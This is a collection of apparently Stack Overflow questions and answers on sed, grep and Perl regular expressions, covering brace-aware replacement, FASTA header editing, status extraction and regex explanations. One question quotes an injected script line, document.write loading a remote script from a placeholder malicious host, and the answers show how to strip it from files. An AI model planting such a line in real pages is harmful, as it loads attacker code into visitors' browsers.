How to find and replace with sed, except when between curly braces?

I have a command like this, which marks words to appear in an index in the document:
sed -i "s/\b$line\b/\\\keywordis\{$line\}\{$wordis\}\{$definitionis\}/g" file.txt
The problem is that it finds matches inside existing replacements. For example, "hello" is replaced with \keywordis{hello}{a common greeting}, but then "greeting" may be searched for too, giving \keywordis{hello}{a common \keywordis{greeting}{a phrase used when meeting someone}}...
How can I tell sed to perform the replacement, but ignore text that is already inside curly brackets?
Curly brackets in this case will always appear on the same line.

How can I tell sed to perform the replacement, but ignore text that is already inside curly brackets?
First, tokenize the input. Place something unique, like | or the byte \x01, around every \keywordis{hello}{a common greeting} and store that in the hold space. Something along the lines of 's/\\the regex to match{hello}{a common greeting}/\x01&\x01/g'.
Then iterate over the elements in the hold space. Use \n to separate elements already parsed from those not yet parsed, that is, output from input. If an element matches the format \keywordis{hello}{a common greeting}, just move it to the front, before the newline in the hold space; if it does not, perform the replacement. Here's an example: "Identify and replace selective space inside given text file", which uses a double newline \n\n as the input/output separator.
Because, as you noted, replacements can contain words that overlap with the patterns you are searching for, I believe the simplest approach is, after each replacement, to shuffle the pattern space as if it were ready for output and start the process all over for the current line.
Then, at the end, shuffle the hold space to remove the \x01 bytes, the newline and any leftovers, and output.
Overall, it's LaTeX. I believe it would be simpler to do it manually.
By "eating" the string from the back and placing it in front of input/output separator inside pattern space, I simplified the process. The following program:
sed '
# add our input/output separator - just a newline
s/^/\n/
: loop
# l1000
# Ignore any "\keywords" and "{stuff}"
/^\([^\n]*\)\n\(.*\)\(\\[^{}]*\|{[^{}]*}\)$/{
s//\3\1\n\2/
b loop
}
# Replace hello followed by anything not {}
# We match till the end because regex is greedy
# so that .* will eat everything.
/^\([^\n]*\)\n\(.*\)hello\([{}]*\)$/{
s//\\keywordis{hello}{a common greeting}\3\1\n\2/
b loop
}
# Hello was not matched - ignore anything irrelevant
# note - it has to match at least one character after newline
/^\([^\n]*\)\n\(.*\)\([^{}]\+\)$/{
s//\3\1\n\2/
b loop
}
s/\n//
' <<<'
\keywordis{hello}{hello} hello {some other hello} another hello yet
'
outputs:
\keywordis{hello}{hello} \keywordis{hello}{a common greeting} {some other hello} another \keywordis{hello}{a common greeting} yet

Related

Add words at beginning and end of a FASTA header line with sed

I have the following line:
>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGTCAAATCAATGATATGATTTTATCTCTTCTTAGTAAAGGTAGACTTATAATTAG
AGAAAACAAC
I would like to convert the first line as follows:
>INITWORD/XXX-220_5004_COVID-A6/FINALWORD
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT...
So far I have managed to add the first word as follows:
sed 's/>/>INITWORD\//I'
That returns:
>INITWORD/XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT
How can I add the FINALWORD at the end of the first line?

Just substitute more. sed conveniently allows you to recall the text you matched with a back reference, so just embed that between the things you want to add.
sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%I' file.fasta
I also added a ^ beginning-of-line anchor, and switched to % delimiters so the slashes don't need to be escaped.
In some more detail, the s command's syntax is s/regex/replacement/flags where regex is a regular expression to match the text you want to replace, and replacement is the text to replace it with. In the regex, you can use grouping parentheses \(...\) to extract some of the matched text into the replacement; so \1 refers to whatever matched the first set of grouping parentheses, \2 to the second, etc. The /flags are optional single-character specifiers which modify the behavior of the command; so for example, a /g flag says to replace every match on a line, instead of just the first one (but we only expect one match per line so it's not necessary or useful here).
The I flag is non-standard (in GNU sed it makes the match case-insensitive), but since you are using it, I assume it does something useful for you.
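A minimal sketch of the back-reference substitution wrapped in a reusable function, in case the two words vary between runs. The function name tag_fasta_header and its two parameters are assumptions made for illustration. The I flag is dropped because > has no case, and the words must not contain %, & or backslashes, which would be interpreted by sed.

```shell
# Hypothetical helper: tag_fasta_header INITWORD FINALWORD < in.fasta
tag_fasta_header() {
  # Only lines starting with ">" match; sequence lines pass through untouched.
  # \1 is the header text captured by \(.*\).
  sed "s%^>\(.*\)%>$1/\1/$2%"
}

printf '>XXX-220_5004_COVID-A6\nTTTATTTGACATGAGTAAATTTCCCC\n' | tag_fasta_header INITWORD FINALWORD
```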

Extracting substring from inside bracketed string, where the substring may have spaces

I've got an application that has no useful api implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, ie "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.

This is purely a regex issue. By using \S you asked to match only non-whitespace characters within (..), but the failing case contains a space, which that pattern does not allow. Make it simple by explicitly listing the characters to match inside (..) as [a-zA-Z ]*, i.e. zero or more upper- and lower-case letters and spaces.
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use character classes [:alnum:] if you want numbers too
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'

sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally
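One thing to watch with a plain s command is that lines without a STATUS(...) field are printed unchanged. A small sketch that prints only the extracted values, using the standard -n option together with the p flag; the function name extract_status is hypothetical.

```shell
# Hypothetical helper: print the text inside STATUS(...) for each line that has one.
extract_status() {
  # -n suppresses automatic printing; the p flag prints only lines where
  # the substitution succeeded, so lines without STATUS(...) are dropped.
  sed -n 's/.*STATUS(\([^)]*\)).*/\1/p'
}

printf '%s\n' 'QMNAME(QMTKGW01) STATUS(Ended normally)' \
              'no status on this line' \
              'STATUS(Running) QMNAME(QMTKGW01)' | extract_status
```

The position of STATUS on the line does not matter here, which covers the case where the fields move around.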

Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input - some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You will want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no matter what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).

substituting spaces for underscores using lookaheads in perl

I have files with many lines of the following form:
word -0.15636028 -0.2953045 0.29853472 ....
(one word preceding several hundred floats delimited by blanks)
Due to some errors out of my control, the word sometimes has spaces in it.
a bbb c -0.15636028 -0.2953045 0.29853472 .... (several hundreds floats)
which I wish to substitute by underscores so to get:
a_bbb_c -0.15636028 -0.2953045 0.29853472 .... (several hundreds floats)
I have tried the following substitution code for each line:
s/\s(?=(\s-?\d\.\d+)+)/_/g;
So lookarounds are apparently not the solution.
I'd be grateful for any clues.

Your idea for the lookahead is fine, but the question is how to replace only spaces in the part matched before the lookahead, when they are mixed with other things (the words, that is).
One way is to capture what precedes the first float (given by lookahead), and in the replacement part run another regex on what's been captured, to replace spaces
s{ (.*?) (?=\s+-?[0-9]+\.[0-9]) }{ $1 =~ s/\s+/_/gr }ex
Notes
Modifier /e makes the replacement part be evaluated as code; any valid Perl code goes
With s{}{} delimiters we can use s/// ones in the replacement part's regex
Regex in the replacement part, that changes spaces to _ in the captured text, has /r modifier so to return the modified string and leave the original unchanged. Thus we aren't attempting to change $1 (it's read only), and the modified string (being returned) is available as the replacement
Modifier /x allows use of spaces in patterns, for readability
Some assumptions must be made here. Most critical one is that the text to process is followed by a number in the given format, -?[0-9]+\.[0-9]+, and that there isn't such a number in the text itself. This follows the OP's sample and, more decidedly, the attempted solution
A couple of details with assumptions. (1) Leading digits are expected with [0-9]+\. -- if you can have numbers like .123 then use [0-9]*\. (2) The \s+ in the inner regex collapses multiple consecutive spaces into one _, so "a  b c" (two spaces after a) becomes a_b_c (and not a__b_c)
In the lookahead I scoop up all spaces preceding the first float with \s+ -- and so they'll stay in front of the first float. This is as wanted with one space but with multiple ones it may be awkward
If they were included in the .*? capture (if the lookahead only has one space, \s) then we'd get an _ trailing the word(s). I thought that'd be more awkward. The ideal solution is to run another regex and clean that up, if such a case is possible and if it's a bother
An example
echo "a bbb c -0.15636028 -0.2953045" |
perl -wpe's{(.*?)(?=\s+-?[0-9]+\.[0-9])}{ $1 =~ s/\s+/_/gr }e'
prints
a_bbb_c -0.15636028 -0.2953045
Then to process all lines in a file you can do either
perl -wpe'...' file > new_file
and get a new_file with changes, or
perl -i.bak -wpe'...' file
to change the file in-place (that's -i), where .bak makes it save a backup.

Would something like this work for you:
s/\s+/_/g;
s/_(-?\d+\.)/ $1/g;

Use a negative lookahead to replace any spaces not followed by a float:
echo "a bbb cc -0.123232 -0.3232" | perl -wpe 's/ +(?! *-?\d+\.)/_/g'

Assuming from your comments that your files look like this:
name float1 float2 float3
a bbb c -0.15636028 -0.2953045 0.29853472
abbb c -0.15636028 -0.2953045 0.29853472
a bbbc -0.15636028 -0.2953045 0.29853472
ab bbc -0.15636028 -0.2953045 0.29853472
abbbc -0.15636028 -0.2953045 0.29853472
Since you said in comments that the first field may contain digits, you can't use a lookahead that searches for the first float to solve the problem. (You could nevertheless use a lookahead that counts the number of floats until the end of the line, but that isn't very handy.)
What I suggest is a solution based on the number of fields defined by the header line.
You can use the header line to learn the number of fields, and replace spaces at the beginning of the other lines until the number of fields is the same.
You can use the perl command line like awk:
perl -MEnglish -pae'$c=scalar @F if ($NR==1);for($i=0;$i<scalar(@F)-$c;$i++){s/\s+/_/}' file
The for loop counts the difference between the number of fields in the current line (given by scalar(@F), where @F is the fields array) and in the first row (stored in $c), and repeats the substitution that many times.
The -a switch puts the perl command line in autosplit mode, and -MEnglish makes the row number available as $NR (like the NR variable in awk).
It's possible to shorten it like this:
perl -pae'$c=@F if $.<2;$i=@F-$c;s/\s+/_/ while $i--' file

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js

You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashes and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be treated literally. For example, in the context address \xabc\xdefx, the RE delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.
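For the case where the comment markers are reliable, the sed range delete can be tried out on a small sample before touching real files. This is a sketch: the function name strip_injected and the idea of passing the marker number as a parameter are assumptions, and the parameter must consist of plain digits or letters so that it is safe inside the regex.

```shell
# Hypothetical helper: strip_injected ID < file.js
# Deletes everything from the line containing /*ID*/ through the line
# containing /*/ID*/, inclusive.
strip_injected() {
  # % is the address delimiter, so the slashes need no escaping;
  # \* matches a literal asterisk.
  sed -e "\%/\*$1\*/%,\%/\*/$1\*/%d"
}

printf '%s\n' 'var a = 1;' '/*123456*/' 'document.write("x");' '' '/*/123456*/' 'var b = 2;' |
  strip_injected 123456
```

Once the output looks right on a sample, the same expression can be combined with the grep -lr file list and sed -i from the question to edit the affected files in place.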

meaning of the following regular expressions written in perl

Here is a piece of code
while($l=~/(\\\s*)$/) {
statements;
}
$l contains a line of text taken from a file; in effect, this code goes through the lines in the file.
Questions:
I don't clearly understand what the condition in the while is doing. I think it is trying to match a group consisting of \ followed by some number of whitespace characters at the end of the line, and the loop should stop whenever a line ends with \ and maybe some whitespace. I am not sure of it.
I came across the statement $a =~ s/^(.*$)/$1/. I understand that ^ forces matching at the beginning of the string, but would (.*$) mean matching all the characters up to the end of the string? Does it mean that the statement is trying to find whether some group of characters at the end is the same as a group of characters at the beginning of the text?

It is interesting to note that this statement:
while ( $l =~ /(\\\s*)$/ ) {
Is an infinite loop unless $l is altered inside the loop so that the regex no longer matches. As has already been mentioned by others, this is what it matches:
( ... ) a capture group, captures string to $1 (that's the number one, not lower case L)
\\ matches a literal backslash
\s* matches 0 or more whitespace characters.
$ matches end of line with optional newline.
Since you do not have the /g modifier, this regex will not iterate through matches. It simply checks whether there is a match, restarting the regex on each iteration, thereby causing an endless loop.
The statement
$a =~ s/^(.*$)/$1/
Looks rather pointless. It captures a string of characters up until end of string, then replaces it with itself. The captured text is stored in $1 and is simply replaced. The only marginally useful thing about this regex is that:
It matches up until newline \n, and nothing further, which may be of some use to a parser. A period . matches any character except newline, unless the /s modifier is present on the regex.
It captures the line in $1 for future use. However, a simple /^(.*$)/ would do the same.

1. the while
Usually while (regex) is used with the /g modifier, otherwise, if it matches, you get an infinite loop (unless you exit the loop, like using last).
statements would be executed continuously in an infinite loop.
In your case, adding the g
while($l=~/(\\\s*)$/g)
will have the while make only one loop, due to the $ - making a match unique (whatever matches up to the end of string is unique, as $ marks the end, and there is nothing after...).
2. $a =~ s/^(.*$)/$1/
This is a substitution. If the string ^.*$ matches (and it will, since ^.*$ matches (almost, see comment) anything) it is replaced with... $1 or what's inside the (), ie itself, since the match occurs from 1st char to the end of string
^ means beginning of string
(.*) means all chars
$ end of string
so that will replace $a with itself - probably not what you want.

It matches a literal backslash followed by 0 or more spaces followed by the end of the line.

It executes statements for all the lines in that text file that contain a \, followed by zero or more spaces ( \s* ), at the end of the line ($).

It matches lines that end with a backslash character, ignoring any trailing whitespace characters.
Ending a line with a backslash is used in some languages and data files to indicate that the line is being continued on the next line. So I suspect this is part of a parser that merges these continuation lines.
If you enter a regular expression at RegExr and hover your mouse over the pieces, it displays the meaning of each piece in a tooltip.

(\\\s*)$ --- this regex means a \ followed by zero or more whitespace characters, followed by the end of the line. Since your regex is wrapped in (...), you can retrieve what it matched using $1 if you need it.
http://rubular.com/r/dtHtEPh5DX
EDIT -- based on your update
$a =~ s/^(.$)/$1/ --- this is a search and replace. Your regex matches a line that contains exactly one character (since you use ., see http://www.regular-expressions.info/dot.html) other than a newline character. Since you use (...), the character that matched is captured in $1, which is then substituted back into $a
EDIT -- you changed your regex so here is the updated answer
$a =~ s/^(.*$)/$1/ -- same as above, except that it now matches zero or more characters (except newline)